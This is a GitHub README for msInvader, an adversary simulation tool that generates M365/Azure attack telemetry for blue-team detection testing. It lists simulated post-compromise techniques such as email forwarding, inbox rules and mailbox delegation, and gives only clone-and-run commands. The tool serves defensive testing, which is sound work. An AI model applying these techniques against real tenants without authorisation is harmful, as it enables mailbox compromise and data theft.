Skip to content

M365/Azure adversary simulation tool that generates realistic attack telemetry to help blue teams improve their detection and response capabilities.

License

Notifications You must be signed in to change notification settings

mvelazc0/msInvader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

msInvader

BlackHat Arsenal 2024 Open_Threat_Research Community

msInvader logo

msInvader is an adversary simulation tool designed for blue teams to simulate real-world attack techniques within M365 and Azure environments. By generating realistic attack telemetry, msInvader empowers detection engineers, SOC analysts, and threat hunters to assess, enhance, and strengthen their detection and response capabilities.

msInvader supports simulating techniques in two common attack scenarios: a compromised user account or a compromised service principal. These scenarios are critical for understanding how adversaries operate after obtaining initial access, allowing teams to simulate post-compromise behaviors and validate their detection and response mechanisms. For user account scenarios, msInvader uses the resource owner password and device authorization OAuth flows to obtain tokens, simulating attacks such as credential compromise (e.g., phishing or password spraying attacks) or MFA bypass (e.g., adversary-in-the-middle (AiTM) or token theft attacks). For compromised service principals, it leverages the client credentials OAuth flow to replicate unauthorized application access.

Once authenticated, msInvader interacts with Exchange Online using three methods: the Graph API, Exchange Web Services (EWS), and the REST API used by the Exchange Online PowerShell module. This flexibility allows blue teams to simulate a wide range of attack techniques across multiple scenarios.

Documentation

Visit the Wiki for documentation.

Demo

msInvader

Supported Techniques

Technique Graph EWS REST
read_email X X
search_mailbox X
search_onedrive X
create_rule X X X
enable_email_forwarding X
add_folder_permission X X
add_mailbox_delegation X
run_compliance_search X
create_mailflow X

For a full list of available techniques, visit Supported Techniques on the Wiki.

Detections

This section will compile public detection strategies tailored to the techniques simulated by msInvader.

Quick Start Guide

Step 1 : Clone repository

git clone https://github.com/mvelazc0/msInvader.git

Step 2: Customize configuration file

  1. Open the config.yaml file located in the msInvader directory.
  2. Customize the configuration file to meet your needs. Refer to the msInvader Configuration file guide for details.
  3. Enable and configure the desired techniques in the playbooks section. Each technique requires specific parameters, which are detailed in the Supported Techniques documentation.

Step 3: Run msInvader

To run msInvader with your configuration file:

python msInvader.py -c config.yaml

Author

References

License

This project is licensed under the Apache 2.0 License - see the LICENSE file for details

About

M365/Azure adversary simulation tool that generates realistic attack telemetry to help blue teams improve their detection and response capabilities.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages